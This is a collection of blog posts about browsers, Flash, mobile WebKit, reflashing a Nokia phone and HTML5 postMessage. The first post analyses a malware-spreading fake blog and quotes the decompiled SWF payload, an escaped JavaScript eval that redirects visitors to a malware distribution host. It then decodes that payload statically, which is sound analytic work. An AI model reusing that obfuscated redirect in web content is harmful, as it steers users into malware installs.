Nasty blog, scary flash, why are you attacking me?

Yesterday I noticed that all of a sudden no less than 6 new sites linked to this small-time blog. Great huh? Except when checking out those blogs (all on Google’s Blogger platform by the way), I quickly saw they were fake, attempting to trick users into installing malware on their Windows PCs.
Being the curious would-be hacker I am, I took the plunge to see how these guys go about trying to infect careless users:

  1. the blogpost contains what seems to be a YouTube movie, but which actually is just an animated GIF with a link behind it
  2. when clicking “the movie” to play, a swf-file is downloaded (blog.swf)
  3. that blog.swf (which I downloaded on my Linux box and decompiled on the command line using flare) contains this simple code:
    • this.getURL("javascript:eval(unescape('%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B'))");
    • which translates roughly into “go to http://m08b.com/in.cgi?default”
  4. and that URL then takes you for a rollercoaster ride, going through several redirector-sites before arriving on a dark corner of the web where you’re told to install an activeX-component to watch a movie or a codec or sometimes even be told (the irony) to install antivirus software from some unknown company.
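The decoding in step 3 can be done without running the payload. The sketch below is an added example, not part of the original post or of flare: it peels the unescape() layers out of the decompiled call as plain strings and reads the redirect target from the result. The function names and the page URL used to resolve the protocol-relative target are assumptions.

```javascript
// Added example: static decoding only. Nothing here is eval'd or fetched.

// The getURL() call from the decompiled blog.swf, as quoted in the post.
const decompiled = "this.getURL(\"javascript:eval(unescape('" +
  "%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62" +
  "%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B" +
  "'))\");";

// Same mapping as the legacy unescape(): %XX and %uXXXX become code units.
// decodeURIComponent() would throw on %uXXXX or on bytes that are not UTF-8.
function unescapeStatic(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Peel nested unescape('...') layers up to a fixed depth; return every layer.
function peelLayers(source, maxDepth = 5) {
  const layers = [];
  let current = source;
  for (let i = 0; i < maxDepth; i++) {
    const m = /unescape\(\s*(['"])([^'"]*)\1\s*\)/.exec(current);
    if (!m) break;
    current = unescapeStatic(m[2]);
    layers.push(current);
  }
  return layers;
}

// Read the target of a "window.location = ..." style assignment, if any.
function redirectTarget(js) {
  const m = /(?:window\.|document\.)?location(?:\.href)?\s*=\s*(['"])(.*?)\1/.exec(js);
  return m ? m[2] : null;
}

// pageUrl is the page hosting the SWF (assumed); it supplies the scheme
// for protocol-relative targets such as "//host/path".
function analyse(source, pageUrl) {
  const layers = peelLayers(source);
  const target = redirectTarget(layers.length ? layers[layers.length - 1] : source);
  const absolute = target ? new URL(target, pageUrl).href : null;
  return { layers, target, absolute };
}

console.log(analyse(decompiled, "http://fake-blog.example/post.html"));
```

The decoded target is protocol-relative, so it inherits the scheme of the page the SWF was embedded in.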

Some lessons learned;

  • Flash is evil (or it can be) as it allows attackers to hide malicious code inside a nice looking (and binary) swf-file.
  • Don’t trust the incoming links functionality Google’s blogsearch provides (I switched back to Technorati for the ‘binnenkomers’-widget on my blog)
  • The ‘report web forgery’ function in Firefox (under ‘help’) works great. Use it!

Hey Adobe; get your Flash together

Flash sucks! Really! It crashes my Firefox all too often (every few days, especially when behind our company proxy) and playing Flash movies consumes way too much CPU-power for my liking. Apparently Mozilla and Adobe are blaming each other with regard to some of these problems, but this really seems to be a Flash-issue;

Moreover, I found a great howto on “Bort’s w3bl0g” about how to wrap Flash inside NSPluginWrapper in (Ubuntu) Linux, isolating Firefox from Flash-crashes. I’ll try that over the weekend, but it sure looks great!
But anyway; Adobe, get your shit together!

Google to launch Chrome, a Webkit-based browser

Yesterday Google confirmed that it would be releasing a new browser in beta today, named Chrome. Everything there is to know about this new open source browser for now, can be found in an online comic.
Based on that publication, the most important features seem to be;

  • each tab runs its own sandboxed process, limiting the damage one tab or plugin within a tab can do (as is also the case in MSIE 8 beta with what they call “Loosely coupled IE”)
  • it is based on WebKit (remember KHTML and Apple’s Safari and all those mobile browsers)
  • it features a new JavaScript virtual machine, built by v8, a Danish company
  • the ‘omnibox’ (cfr. the ‘awesomebar’ in Firefox) is located on the tab-level instead of the window and is tightly integrated with (you guessed it) Google
  • a new tab shows you your 9 most visited sites and your 3 most used search-engines (a bit like Opera Speeddial)
  • it features an ‘incognito’ mode in which nothing is logged (cfr. InPrivate browsing in IE 8 beta 2)
  • google gears comes prebaked
  • it is not clear if Google used Mozilla’s XUL/chrome to build the UI elements, but the name might be an indication that they did and the comic does state that Google “owes a great debt to other open source browser projects, especially Mozilla and Webkit”, so …

Looks very interesting, I’ll download it as soon as it’s available later today. But I’m curious what the Mozilla-guys think of what must be a double dent in their ego with a friend gone foe (well, to a certain extent) and with Google not using Mozilla’s Gecko as html-rendering engine.

I’ve seen the browser-future, and it works!

Although browsers clearly have become better, faster and stronger (I doubt they’ve become “harder” as well), it sometimes seems as if no revolutions have taken place apart from the introduction of XMLHttpRequest by Microsoft back in 2000. But this morning I saw something that really blew my mind and the live mashup of that great Daft Punk song perfectly describes the mood I’m in since.
The reason for all this excitement is a prototype of new functionality in Firefox that redefines how you can interact with websites and -applications, allowing you to use the web more efficiently. Just watch this video to see what I’m raving about (skip the first 50 seconds to see the actual goods);

Ubiquity, as the 0.1 Firefox add-on is called, is the work of a group of smart people at Mozilla Labs, headed by Aza Raskin. Aza is the guy behind Humanized, the company that developed Enso, a merger of a GUI and a CLI leveraging the power of language in a graphical user interface. Aza and a number of his co-workers joined Mozilla at the beginning of 2008 and they’ve already produced some innovative ideas over the last few months.
Ubiquity is past that initial idea-stage, with a prototype that really builds on the great ideas Aza and his Humanized co-workers had with regards to the power of language in a UI. I’ll bet you this will be the way to disclose and use microformats in Firefox as well (breaking the deadlock the microformat-guys were in). Even though it’s still in alpha/prototype phase, this is the Future guys and it works! Now try it out, will ya!!

Webkit Konquering the mobile world

With the nineties browser wars and the quasi MSIE monopoly that followed after the Netscape debacle behind us, the desktop browser scene can be considered a mature market, with some very good products vying for our approval. Time to shift our attention to the next battleground; mobile browsers. Netfront and Pocket Internet Explorer dominated this emerging market for quite some time, but as of late some newcomers are making great advances in this area. And apart from Opera Mobile and Mini (the Mozilla-guys are really ages behind here), these all share the same open source core; WebKit.
The history of WebKit in 10 1/2 sentences
WebKit is a fork of KHTML, the html rendering-engine that was developed by the KDE-community for its Konqueror-browser. In 2002 Apple decided to build its own browser based on KHTML and thus WebKit was born as the core-component of what would become Safari. Since its inception, WebKit has gained enormous momentum; Safari now has a market share of approx 6% on the desktop, but smaller projects such as iCab and Epiphany (the Gnome browser!) picked up WebKit as well. But there’s more; Adobe decided to incorporate it in Air (the Flex-like platform for building desktop-software). And Trolltech, the company behind the Qt GUI-toolkit and one of the primary backers of KDE, announced they would include WebKit in Qt 4.4 as well.

WebKit 0wnz Mobile
But the mobile area is where WebKit is really taking the world by storm; it not only powers the mobile version of Safari on the iPhone and the iPod Touch, but WebKit (in its S60webkit form) is also the basis of Symbian’s S60-browser. Nokia’s Mini Map Browser, as it’s officially named, was first released in November 2005 and thanks to the success of Symbian it’s probably the most widespread mobile browser by far. Being a proud Nokia e61i-owner myself, I can testify that it is a great browser indeed; I didn’t even bother with installing Opera Mini (which I used instead of Netfront on my Sony-Ericsson w810).
Next to these two well-established WebKit-derivatives, the lesser known Iris (for Windows Mobile), newcomer Digia (for Symbian UIQ-devices) and last but not least the browser of Google’s highly anticipated mobile Android OS are also part of the family.
Mobile Web, but there’s more than One
So thanks to KDE’s great job on KHTML and Apple’s (and Nokia’s) subsequent work, we are at a point where users of ‘smartphones’ and similar devices can access the internet almost as if they were using a desktop-browser. But screen-size, text-input, data transfer (bandwidth and price) and context remain very different from normal browsing, so don’t believe the “one web”-hype just yet. But still; these sure are great web times for building mobile(-ready) websites and -applications!

Spammers grabbing headlines

Spam headlines sure make for an interesting read nowadays;

For a split second they succeeded in getting my attention and I almost opened some of these mails on mere impulse. A good thing they were already classified as spam.

Whack your Flash-crazy boss on the head with his iPhone3G!

Whatever you may think about the iPhone-hype, you’ll have to admit that the fact that it doesn’t do Flash makes for great ammunition in the discussion against developing your site’s core functionality in Flash.
Next time your CEO or marketing manager wants a Flex-only website, you won’t have to talk about some obscure geek who doesn’t want to install the Flash plugin, about that poor blind woman who is not able to “read” those Flash animations or about how Google indexing SWF-files might be more of a problem than a solution. No, instead, you’ll only have to point out it won’t work on his iPhone (*). Period.

(*) It won’t work on other mobile devices either; Flash Lite, which ships on e.g. Symbian and Windows Mobile powered devices, is not able to display those millions of fancy animations out there on the WWW either.


Flashing my Nokia keyboard into shape

So I bought a 2nd hand Nokia e61i which had a messed up keyboard configuration. Symbian OS does not allow you to change your keyboard settings as I had hoped for somewhat naively. The configuration is ‘hardcoded’ in the firmware and cannot be changed officially except by Nokia Service personnel. A good thing there’s Google, a nice little hacker tool and the Nokia Software Update utility.
These are the steps I followed to flash my Nokia with the correct firmware (only possible under MS Windows XP or Vista afaik);

  1. Back up your phone’s data using e.g. the Nokia PC suite (this will not back up the old firmware, only your data)
  2. Press *#0000# on your phone and write down the firmware info you see, in my case this was:
    • 2.0633.65.01
    • 02-10-07
    • RM-227
    • nokia e61i-1
  3. Check the product code of your phone (underneath the battery) and write that down. In my case this was “0542890”
  4. Go to this page to find alternative product codes for your phone, crosschecking with the info from (2) and (3). I decided I needed “0538563 EURO A Mocha/Silver” (which has QWERTY) instead of the current “0542890 EURO D French Mocha/Silver” (which has AZERTY)
  5. Download and install “Nokia Software Updater” and “Nemesis Service Suite”
  6. Think twice before proceeding, the steps below may cause permanent damage to your phone and may void your warranty! You have been warned!
  7. So you’re sure you want to proceed? OK;
  8. Make sure the USB connection between your PC and phone can remain in place for the next 30 minutes or so (no cats or children that might want to play with that USB-cable). The USB-connection is your phone’s lifeline, if it gets cut during the upgrade, your phone dies (well, kinda).
  9. Fire up Nemesis:
    1. click on the right top button (with the magnifying glass) to scan for a new device
    2. click on the 2nd icon labeled “Phone Info”
    3. in the “Production data edit” pane check the box next to “product code” and press “read”. The value there should match the product code you wrote down earlier
    4. replace the product code with the one you think you need (cfr. step 4) and press “write” (and do a “read” again to make sure the value is correct).
    5. close Nemesis
  10. Start Nokia Software Updater (can be done from within the PC Suite).
    1. NSU actually is a pretty straightforward wizard that will guide you through the upgrade process. You will be warned several times about the dangers of flashing your phone, but by this step you should know what you are doing, no?
    2. During the upgrade, your phone will restart several times, you’ll hear Windows play the sound to indicate USB-devices are plugged out/in. Don’t worry, this is normal.
    3. Close NSU when it says it’s ready
  11. Disconnect the USB-cable
  12. Check your phone’s firmware information by pressing *#0000# again. In my case this was
    • 3.0633.69.00
    • 06-02-08
    • RM-227
    • nokia e61i-1

So there you have it, not only was my keyboard mapping problem solved, I also got a free upgrade to the latest Nokia firmware. Qnd there zqs much rejoicing! 😉

WordPress 2.6 svn-upgrade; ouch!

WordPress 2.6 has been pushed out the door at Automattic and it contains some exciting new goodies as usual. So I fired up my trusty upgrade script, but got an ugly php-error when accessing the database update-pages:

Parse error: syntax error, unexpected T_SL in wp-includes/widgets.php on line 464

Turns out that the wp_widget_search-function in wp-includes/widgets.php included some remnants of an SVN-merge. Don’t know if it was a sync problem at my side or if the faulty code was on the SVN-server (it isn’t now), but I ended up copy/pasting the correct function from a fresh tar-ball I downloaded.

New: cross-document messaging

With new versions of our trusted browsers coming out, web developers who like living on the edge can start using some of the new features that are becoming available. One such goody is cross-document messaging, which is part of the HTML5 draft spec.
Cross-document messaging allows children of a window (think iframes, popups, …) to communicate using JavaScript, even if they originate from a different domain. This means that instead of just iframing an external application, without being able to integrate further, your page can send messages to and receive messages from it. postMessage could even be used to do cross-domain XHR (a hidden iframe on the same domain as a remote datasource can be used as a proxy to perform XMLHttpRequests on that remote domain) until the real thing hits the streets as well.
The two additions that allow you to perform such messaging are window.postMessage and an event listener for events of the “message” type to handle the message. A pretty straightforward example of this can be found on JQuery’s John Resig’s site (see also his latest blog entry about postMessage). As cross-domain JavaScript can potentially be a big security risk, taking some precautions is really really really really really necessary. Really!
On the downside (as if security is not a problem); this brand new feature is only available in Firefox 3 for now. My own little test (a copy of John Resig’s example with some minor tweaks) worked in Opera 9.2x (and 9.5b) as well, but postMessage seems to have been dropped from the final Opera 9.5, as the tests on Opera Labs don’t seem to work any more either. Support for postMessage is also available in WebKit (Safari’s backbone) nightly builds and in Microsoft’s IE 8 BETA (with the event being ‘onmessage’ instead of ‘message’ and some other quirks but hey, this is beta, no?).
So expect postMessage to be available in all major browsers by the end of the year. But why wait if you know that Facebook is already using postMessage in their chat application? I wonder what they fall back to if it is not available though …
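The precautions mentioned above come down to checking who sent a message and treating its content as untrusted input. The receiver below is an added example, not taken from this post or from John Resig's demo; the trusted origin, the "widget" element id and the JSON "resize" message format are assumptions.

```javascript
// Added example: origin, element id and message shape are assumptions.
const TRUSTED_ORIGINS = new Set(["https://widgets.example.com"]);

// Decide whether a received "message" event may be acted on.
function checkMessage(event, trusted = TRUSTED_ORIGINS) {
  // 1. Exact match on the sender's origin (scheme + host + port). A substring
  //    or prefix test would also accept look-alike hosts such as
  //    https://widgets.example.com.attacker.example.
  if (!trusted.has(event.origin)) return { ok: false, reason: "origin" };

  // 2. The payload is untrusted input: bound its size and parse it as data.
  //    It never goes to eval() or innerHTML.
  if (typeof event.data !== "string" || event.data.length > 256) {
    return { ok: false, reason: "format" };
  }
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch (e) {
    return { ok: false, reason: "format" };
  }

  // 3. Accept only the one message type this page expects, with sane values.
  if (msg === null || typeof msg !== "object" || msg.type !== "resize" ||
      !Number.isInteger(msg.height) || msg.height < 0 || msg.height > 5000) {
    return { ok: false, reason: "schema" };
  }
  return { ok: true, height: msg.height };
}

// Browser wiring (skipped when the file is run outside a browser).
if (typeof window !== "undefined") {
  window.addEventListener("message", (event) => {
    const result = checkMessage(event);
    if (result.ok) {
      document.getElementById("widget").style.height = result.height + "px";
    }
  });
  // Sending side: pass the receiver's origin as the second argument instead
  // of "*", so the browser drops the message if the frame has navigated away:
  //   frame.contentWindow.postMessage('{"type":"ping"}', "https://widgets.example.com");
}
```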